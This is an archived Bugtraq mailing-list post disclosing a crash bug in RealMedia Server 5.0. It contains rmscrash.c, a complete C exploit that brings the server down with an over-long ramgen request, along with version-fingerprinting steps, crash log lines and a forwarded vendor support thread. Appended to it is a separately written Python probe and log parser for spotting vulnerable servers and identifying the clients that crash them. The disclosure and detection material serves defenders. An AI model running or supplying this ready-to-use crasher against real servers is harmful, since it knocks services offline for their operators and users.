Bugtraq mailing list archives

RealMedia Server 5.0 Crasher (rmscrash.c)


From: bow () BOW NET (bow)
Date: Wed, 22 Dec 1999 22:33:21 -0800


RealMedia 5.0 servers, and probably 4.0, can be crashed by overflowing
the buffer which stores the ramgen requests.

I emailed RealNetworks about it and they finally got back to me a month and
a half later. Their response was that it's a known issue with 5.0 and the
only way to fix it is to upgrade to 6.0. Of course upgrading means paying
more money.

I really wish all companies would fully back their COMMERCIAL software and
make patches for previous releases. Oh well.

The exploit is included below. It's been tested on FreeBSD and RealMedia
server 5.0-rvserver-build-290. When the server crashes, it logs the IP of the
person who crashed it in the pnserver error log. It looks like this:

  ***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Attempting Crash Avoidance...
  ***22-Dec-99 10:57:16.112 pnserver(241): Fault caused by type 0 client from 204.216.183.2
  ***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Crash Avoidance Successful
  ***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Couldn't Handle Fault: Terminating...
  ***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Please File Bug Report

An easy way to tell if a server is running 5.0 is to telnet to the RealMedia port,
usually 7070, and type:

  GET /SmpDsBhgRl <enter><enter>

From what I've seen, RealMedia 5.0 servers always return "Server: RealServer 1.0 Beta" in the
headers, and G2 (6.0, and 7.0?) servers return "Server: RMServer 1.0".

A hacked-up fix for the problem that I've used is to edit the pnserver binary and change the ramgen
string to something else. This, however, will break the ramgen functionality (which I don't use).
If you are going to rename the ramgen in the binary to something else, make sure it matches the string
length of 6.

-bow

-- START OF RMSCRASH.C --

/*
 *  rmscrash.c  - bow () bow net
 *
 *  Crash a RealMedia 5.0 server by sending a very long ramgen request.
 *
 *  Tested on:
 *         $ pnserver -v
 *         Version:        5.0-rvserver-build-290
 *         Platform: FreeBSD-2.1.x
 *
 */

#include        <stdio.h>
#include        <stdlib.h>
#include        <string.h>      /* memset, memcpy, strlen */
#include        <sys/time.h>
#include        <sys/types.h>
#include        <unistd.h>

#include        <sys/socket.h>
#include        <netinet/in.h>
#include        <netdb.h>

/* Bytes of request line before the " HTTP/1.1" terminator. ~4040 bytes was
 * enough to crash the server in testing; 4082 leaves some margin. */
#define BUFLEN 4082

/* BUFLEN bytes of request + 13 bytes of terminator + NUL. buf is static, so
 * the final byte is already zero and strlen() below sees the whole request. */
char    buf[BUFLEN+14];
int     sock;
struct  sockaddr_in sa;
struct  hostent *hp;

int main (int argc, char *argv[]) {
        int port;

        if (argc < 3) {
                printf("Usage: %s realserver port\n",argv[0]);
                exit(1);
        }

        port = atoi(argv[2]);

        /* "GET /ramgen/" followed by 'A's out to BUFLEN, then the end of the
         * request. This is the over-long ramgen path that trips the fault. */
        memset(buf,0x41,BUFLEN);
        memcpy(buf,"GET /ramgen/",12);
        memcpy(buf+BUFLEN," HTTP/1.1\r\n\r\n", 13);

        /* gethostbyname() does not set errno, so report it directly. */
        if ((hp=gethostbyname(argv[1]))==NULL) {
                fprintf(stderr,"gethostbyname(%s) failed\n",argv[1]);
                exit(1);
        }

        if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
                perror("socket()");
                exit(1);
        }
        sa.sin_family=AF_INET;
        sa.sin_port=htons(port);
        memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
        if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
                perror("connect()");
                exit(1);
        }

        printf("Connected to %s. Sending data\n",argv[1]);
        if (write(sock,buf,strlen(buf))<0)
                perror("write()");
        printf("Done.\n");

        close(sock);
        return 0;
}

--- END OF RMSCRASH.C ---

----- Forwarded message from tsserver () support real com -----

From: tsserver () support real com
Date: Wed, 22 Dec 1999 10:14:57  -0800
Subject: Re: max the ramgen buffer [#7570768]
To: bow () bow net
X-MIME-Autoconverted: from quoted-printable to 8bit by bow.net id KAA03016

Hello Bow,

No, unfortunately there is not. The solution is to upgrade to 6.0 or 7.0.

Best wishes,
Kim
~~~~~~~~~~~~~~~~~~~~
Kimberly Ayars
SDK Support Engineer
------- Original Message --------
From:           bow () bow net
To:             tsserver () support real com
Subject:        Re: max the ramgen buffer [#7570768]
Date:           12/21/99 16:58:20


Well is there a fix for this in the 5.0 server??

-bow

On Tue, Dec 21, 1999 at 04:52:07PM -0800, tsserver () support real com wrote:
Hello Bow,

First of all, I apologize for the delay in responding. Thank you so much for your patience.

This is a known issue in the 5.0 RealServer and is fixed in the 6.0 and 7.0 RealServers.

Best wishes,
Kim
~~~~~~~~~~~~~~~~~~~~
Kimberly Ayars
SDK Support Engineer
------- Original Message --------
From:                bow () bow net
To:          tsserver () support real com
Subject:     max the ramgen buffer
Date:                11/06/99 04:10:46


Making a request to the Real5 server with a long (~4040 bytes) request will crash the server.
Is this a known issue?

***06-Nov-99 03:48:40.248 pnserver(60580): TRAPPED FAULT: Please File Bug Report
***06-Nov-99 03:48:40.248 pnserver(60580): Fault Report:
5.0-rvserver-build-290
FreeBSD-2.1.x


Do you guys have an updated Real5 server?


THE INFORMATION PROVIDED IN THE REALNETWORKS KNOWLEDGE BASE IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND. 
REALNETWORKS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND 
FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL REALNETWORKS OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES 
WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN 
IF REALNETWORKS OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE 
EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT 
APPLY.


Copyright c RealNetworks Inc. and/or its licensors, 1995 - 1999 all rights reserved. RealAudio, RealVideo, RealMedia 
and RealPlayer are trademarks of RealNetworks Inc.


---------------------
Instructions to Reply
---------------------


Your Incident ID number for this request is 7570768

To reply to this message you may simply reply to this email.  (Please do not modify the subject line)

To view all activity on this ticket go to the following URL.  You will also be able to reply from there.


http://customerrelations.real.com/scripts/rnforms/loginpage.asp


To verify your identity, you will be prompted for this Incident ID number and your email address.

----- End forwarded message -----
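A version probe and a log check for this issue, as an added example that is not part of bow's post and not RealNetworks' code. It takes from the post only the port (7070), the "GET /SmpDsBhgRl" probe, the two Server banner strings, and the "Fault caused by type 0 client from <ip>" error-log line; the sample HTTP responses below (status lines, Content-Type) are constructed, and the function names are assumptions of this example. The probe never sends the long /ramgen/ request, so it can be pointed at a production host to find 5.0 servers without knocking them over, and the log parser pulls the source IP the server records before it dies.

```python
"""Fingerprint a RealServer and pull the faulting client out of the pnserver log.

Added example, not bow's code and not RealNetworks'. From the post: port 7070,
the "GET /SmpDsBhgRl" probe, the two Server: banners, and the
"Fault caused by type 0 client from <ip>" log line. The HTTP status lines and
Content-Type in SAMPLE_RESPONSE_* are constructed for the example, not captured.
"""
import re
import socket
from typing import Dict, List, Optional

REAL_PORT = 7070
PROBE = b"GET /SmpDsBhgRl\r\n\r\n"        # the post's probe: any path, then a blank line

# Banners the post reports for each server generation.
VULNERABLE_BANNER = "RealServer 1.0 Beta"  # RealServer 5.0, crashes on a long /ramgen/ path
FIXED_BANNER = "RMServer 1.0"              # G2 (6.0/7.0), fixed per RealNetworks support

_SERVER_HDR = re.compile(rb"^Server:[ \t]*(.+?)[ \t]*\r?$", re.IGNORECASE | re.MULTILINE)

# The pnserver error-log line that names the client which caused the fault.
_FAULT_LINE = re.compile(
    r"^\*{3}(?P<ts>\d{2}-[A-Za-z]{3}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3}) "
    r"pnserver\((?P<pid>\d+)\): Fault caused by type (?P<ctype>\d+) "
    r"client from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})$"
)


def server_banner(response: bytes) -> Optional[str]:
    """Return the Server: header value from a raw response, or None if absent."""
    head = response.split(b"\r\n\r\n", 1)[0]
    m = _SERVER_HDR.search(head)
    return m.group(1).decode("latin-1") if m else None


def classify(response: bytes) -> str:
    """'vulnerable' (5.0), 'fixed' (G2) or 'unknown', by the banners in the post."""
    banner = server_banner(response)
    if banner is None:
        return "unknown"
    if banner.startswith(VULNERABLE_BANNER):
        return "vulnerable"
    if banner.startswith(FIXED_BANNER):
        return "fixed"
    return "unknown"


def probe(host: str, port: int = REAL_PORT, timeout: float = 5.0) -> bytes:
    """Send the short probe and return the reply. Never sends the long request."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(PROBE)
        reply = b""
        try:
            while b"\r\n\r\n" not in reply:
                chunk = s.recv(4096)
                if not chunk:
                    break
                reply += chunk
        except socket.timeout:
            pass                            # headers may arrive without a blank line
        return reply


def faulting_clients(log_text: str) -> List[Dict[str, str]]:
    """Extract ts/pid/ctype/ip from every 'Fault caused by ... client from' line."""
    hits = []
    for line in log_text.splitlines():
        m = _FAULT_LINE.match(line.strip())
        if m:
            hits.append(m.groupdict())
    return hits


# Constructed samples (status lines and Content-Type are not from the post).
SAMPLE_RESPONSE_50 = (b"HTTP/1.0 200 OK\r\nServer: RealServer 1.0 Beta\r\n"
                      b"Content-Type: audio/x-pn-realaudio\r\n\r\n")
SAMPLE_RESPONSE_G2 = b"HTTP/1.0 404 Not Found\r\nServer: RMServer 1.0\r\n\r\n"
# Log lines as quoted in the post, indented the way the post shows them.
SAMPLE_LOG = """\
  ***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Attempting Crash Avoidance...
  ***22-Dec-99 10:57:16.112 pnserver(241): Fault caused by type 0 client from 204.216.183.2
  ***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Crash Avoidance Successful
  ***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Couldn't Handle Fault: Terminating...
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else REAL_PORT
        print(classify(probe(sys.argv[1], port)))
    else:
        print(classify(SAMPLE_RESPONSE_50), classify(SAMPLE_RESPONSE_G2))
        for h in faulting_clients(SAMPLE_LOG):
            print(h["ts"], "pid", h["pid"], "client", h["ip"])
```

Run it with a host (and optional port) to classify a live server, or with no arguments to exercise the constructed samples. Banner matching is a prefix check because the post only gives the two strings as observed, not as an exhaustive list; anything else is reported as unknown rather than guessed.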

